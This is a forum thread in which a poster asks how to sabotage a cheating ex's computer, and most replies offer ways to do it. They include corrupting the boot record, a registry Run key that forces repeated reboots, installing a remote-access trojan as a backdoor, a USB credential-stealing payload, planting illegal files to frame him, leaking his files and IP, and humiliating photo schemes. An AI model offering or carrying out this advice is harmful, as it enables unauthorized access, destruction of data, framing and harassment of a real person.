Is it wrong ?

Kateweb

Is it wrong to reformat on a cheeter?  

35 members have voted

1. 1.

• No
    • Yes

This is all hypothetical of course

But is it wrong to write a batch file that would reformat a cheating ex's hard drive on a schedule?

And if not what is the best way to impliment it ?

(yes i know balck hat but I did say hypothetical)

ok... here's a revolutionary idea... why don't we just forget the ex even existed! rather than try to own their box or fuck up their posessions, let's just ignore them!

meh, we could do what the mod said, and just follow our intelligent rationally thinking minds. OR we could give in to the primitive urges that drive us to seek pain and revenge in those that have hurt us.

I personally like the pain and revenge option myself

You could always do something like this

http://duggmirror.com/design/Dont_mess_wit...r_web_designer/

cos i just feel that deleting somebody's files isn't really a great source of pain and anguish, whereas the embarresment caused by the above might be a little bit better.

Whatever the case, if you really want to hurt somebody, you should be setting the bar higher than just formatting c:

oh, and before anyone starts flaming, please, i already know i'm going to hell, so there's really no use in fighting it.

it depends if your feeling blackhat or whitehat

<blackhat>

if it's a windows box (I'm guessing it is) you could delete boot.ini or just corrupt the Main Boot Record and it's pretty screwed, but that can fixed with a simple windows recovering from the boot disc

<blackhat/>

<whitehat>

just move on in life and forget about it

ok... here's a revolutionary idea... why don't we just forget the ex even existed! rather than try to own their box or fuck up their posessions, let's just ignore them!

<whitehat/>

If the target is a complete Windows NOOB you could simply change the system font to 150 pixel WinDings.

Should keep the individual stumped for a while (as the bottom-left portion of the start button, which doesn't read 'Start' anymore, would be filling his entire screen).

If the target is a complete Windows NOOB you could simply change the system font to 150 pixel WinDings.

Should keep the individual stumped for a while (as the bottom-left portion of the start button, which doesn't read 'Start' anymore, would be filling his entire screen).

i love that comment, but really while your at it change his res to the lowest available and the color setting down to the lowest as well and possible steal a couple of sticks of ram and i think that's enough suffering for him :) but really take moonlit's advice

The coolest way is to get is to restart after 20 seconds with a text thats say:

u cheated and now even you computer dont want to talk to you :P

(dont_talk.cmd)

shutdown -r -f -t 20 -c "u cheated and now even you computer dont want to talk to you"

reg

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]

dont_talk=c:windowsdont_talk.cmd

and maybe leave a backdoor incase you find out that it isnt you child at all!!!!

http://prorat.net/

:D

how said it was me :lol:

walking in on another girl and your (ex)boyfriend in your bed is not plesent I so nead to hurt this guy i think i would rather take picktures of his lush skank doing some one esle and plaster em up at school. but that just not nice to the other guy.

walking in on another girl and your (ex)boyfriend in your bed is not plesent I so nead to hurt this guy i think i would rather take picktures of his lush skank doing some one esle and plaster em up at school. but that just not nice to the other guy.

And that, my friends, is why they invented Photoshop. :twisted:

And that, my friends, is why they invented Photoshop. :twisted:

I should also mention that this is the same guy who droped my laptop and didnot want to pay for the dameges untill he was encouged to do so.

Get some boots, kick him in the balls, repeat until he's singing soprano. Jobs a good 'un.

well if he wasent almost 7' tall i would be tempted but i would rather have him hurt much much longer for loseing all his pron and movie downloads , I would leave the win partishion alone and just dump every thing else once a week , hoptheitcly ofcouse.

I have moved out.

Disclaimer: The following HYPOTHETICAL advice may recommend doing something that is illegal in your state/country or unethical for your species. Please Do NOT follow this advice.

Now that my ass is covered:

Hypotheically, use the Switchblade/Hacksaw/VNC/(Optional:Folding@Home) Payload, Rcrack his passwords, post any useful/intresting/embarrasiong files from his USB keys on the web and submit the link to others, use VNC to connect to his box, and have fun fucking around. Download something illegal onto his computer and tip off the feebs.

Again do NOT listen to me. I am often immature, and probobly going to hell. And out of the USA's jurisdiction.

The coolest way is to get is to restart after 20 seconds with a text thats say:

u cheated and now even you computer dont want to talk to you :P

(dont_talk.cmd)

shutdown -r -f -t 20 -c "u cheated and now even you computer dont want to talk to you"

reg

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]

dont_talk=c:windowsdont_talk.cmd

and maybe leave a backdoor incase you find out that it isnt you child at all!!!!

http://prorat.net/

:D

how said it was me :lol:

this is freaking awesome but i mean ir would drive him insane

You could always change his wallpaper to an image of you fucking his best friend, but thats just the way that I roll.

or may be created a script that pop's up goatse or lemon party or a variety of other shock site image. it would be fun just seeing his face thoough

Since you moved out, this is impossible, but you also coulda slapped a bunch of fridge magnets to the side of his computer (to be more subtle, just open the case, and toss a bunch in, slapping some onto the HDD), and close the case again.

Or just do what I did once (in bad mood, had REALLY old computer that I was gonna toss out), smash the shit outta it with a wood stick, then a metal shovel, then a cement block from the fireplace.

Since you moved out, this is impossible, but you also coulda slapped a bunch of fridge magnets to the side of his computer (to be more subtle, just open the case, and toss a bunch in, slapping some onto the HDD), and close the case again.

Or just do what I did once (in bad mood, had REALLY old computer that I was gonna toss out), smash the shit outta it with a wood stick, then a metal shovel, then a cement block from the fireplace.

i still have the keys since i still get my mail theiir, and some of my crap. i have some idias now even if i don't do it he's all paraniod that i will witch is rather nice. sad part is i dont think i'll be able to get my hard drive or dvd burner back cuse the ones in that case are mine i was just nice enof to let him use them. big mistake on my part. mabee i'll just post his public ip on the net.